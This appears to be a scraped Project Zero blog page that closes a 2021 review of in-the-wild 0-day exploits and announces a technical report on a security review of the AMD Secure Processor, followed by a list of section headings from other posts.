Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.
Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.

Through 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted over and over how governments were using commercial surveillance products against journalists, human rights defenders, and government officials. We saw many enterprises scrambling to remediate and protect themselves from the Exchange Server 0-days. And we even learned of peer security researchers being targeted by North Korean government hackers. While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.

2021 showed us we’re on the right track and making progress, but there’s plenty more to be done to make 0-day hard.

Google Project Zero
Release of Technical Report into the AMD Security ProcessorAnonymous
10 May 2022 at 19:00

Release of Technical Report into the AMD Security Processor

Google Project Zero

By: Anonymous

10 May 2022 at 19:00

Posted by James Forshaw, Google Project Zero

Today, members of Project Zero and the Google Cloud security team are releasing a technical report on a security review of AMD Secure Processor (ASP). The ASP is an isolated ARM processor in AMD EPYC CPUs that adds a root of trust and controls secure system initialization. As it's a generic processor AMD can add additional security features to the firmware, but like with all complex systems it's possible these features might have security issues which could compromise the security of everything under the ASP's management.

The security review undertaken was on the implementation of the ASP on the 3rd Gen AMD EPYC CPUs (codenamed "Milan"). One feature of the ASP of interest to Google is Secure Encrypted Virtualization (SEV). SEV adds encryption to the memory used by virtual machines running on the CPU. This feature is of importance to Confidential Computing as it provides protection of customer cloud data in use, not just at rest or when sending data across a network.

A particular emphasis of the review was on the Secure Nested Paging (SNP) extension to SEV added to "Milan". SNP aims to further improve the security of confidential computing by adding integrity protection and mitigations for numerous side-channel attacks. The review was undertaken with full cooperation with AMD. The team was granted access to source code for the ASP, and production samples to test hardware attacks.

The review discovered 19 issues which have been fixed by AMD in public security bulletins. These issues ranged from incorrect use of cryptography to memory corruption in the context of the ASP firmware. The report describes some of the more interesting issues that were uncovered during the review as well as providing a background on the ASP and the process the team took to find security issues. You can read more about the review on the Google Cloud security blog and the final report.

Normal view

An observation

NSExpression NSPredicate NSExpression

A tale of two parts

Covering tracks

NSXPC

Grep to the rescue

Parsing vs Evaluation

Old techniques, new tricks

Finding a voice

Predicated Sections

Payload 2

Expression 1

Expression 2

Expression 3

Expression 4

Expression 5

Expression 6

End of the line

Conclusion

Background

ASN.1 encoding

ASN.1 bitstrings

Parsing ASN.1

NSS ASN.1 state machine

Buffer management

Why wasn't this found by fuzzing?

Perhaps it's not being fuzzed?

Can it be fuzzed effectively?

History

Conclusions

Vouchers

Keys

Values

Userdata attrs

Recipes

Destruction

The bug

Conclusions

PoC:

Executive Summary

A Record Year for In-the-Wild 0-days

More detection

More disclosure

New Year, Old Techniques

Chromium (Chrome)

WebKit (Safari)

Internet Explorer

Windows

iOS/macOS

Android

Microsoft Exchange Server

Outstanding Questions

Where are the [x] 0-days?

Do some vendors have no known in-the-wild 0-days because they’ve never been found or because they don’t publicly disclose?

Are we seeing the same bug patterns because that’s what we know how to detect?

Where are the spl0itz?

Conclusion